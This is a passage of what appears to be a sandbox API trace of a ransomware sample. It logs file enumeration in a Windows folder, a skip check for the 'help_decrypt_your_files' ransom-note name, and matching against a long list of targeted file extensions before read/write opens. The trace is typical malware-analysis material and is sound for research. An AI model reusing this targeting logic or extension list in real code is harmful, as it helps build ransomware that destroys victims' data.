	[0167.565] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", cchLength=0x66 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned 0x66
	[0167.565] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.566] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.566] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"
	[0167.566] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned 102
	[0167.566] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.566] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.566] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0167.567] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.567] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0167.567] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.567] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.567] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0167.568] CloseHandle (hObject=0xffffffff) returned 1
	[0167.568] CloseHandle (hObject=0xffffffff) returned 1
	[0167.568] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="behavior.xml", cAlternateFileName="")) returned 1
	[0167.568] lstrcmpW (lpString1="behavior.xml", lpString2="..") returned 1
	[0167.568] lstrcmpW (lpString1="behavior.xml", lpString2=".") returned 1
	[0167.568] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\"
	[0167.569] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="behavior.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"
	[0167.569] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned 100
	[0167.569] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.569] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", cchLength=0x64 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned 0x64
	[0167.569] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.569] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.569] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"
	[0167.569] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned 100
	[0167.570] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.570] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.570] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0167.570] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.570] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0167.571] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.571] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.571] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0167.571] CloseHandle (hObject=0xffffffff) returned 1
	[0167.571] CloseHandle (hObject=0xffffffff) returned 1
	[0167.572] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="watermark.png", cAlternateFileName="")) returned 1
	[0167.572] lstrcmpW (lpString1="watermark.png", lpString2="..") returned 1
	[0167.572] lstrcmpW (lpString1="watermark.png", lpString2=".") returned 1
	[0167.572] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\"
	[0167.572] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="watermark.png" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"
	[0167.572] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned 101
	[0167.572] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.572] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", cchLength=0x65 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned 0x65
	[0167.573] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.573] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.573] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"
	[0167.573] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned 101
	[0167.573] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.573] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.574] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0167.574] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.574] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.x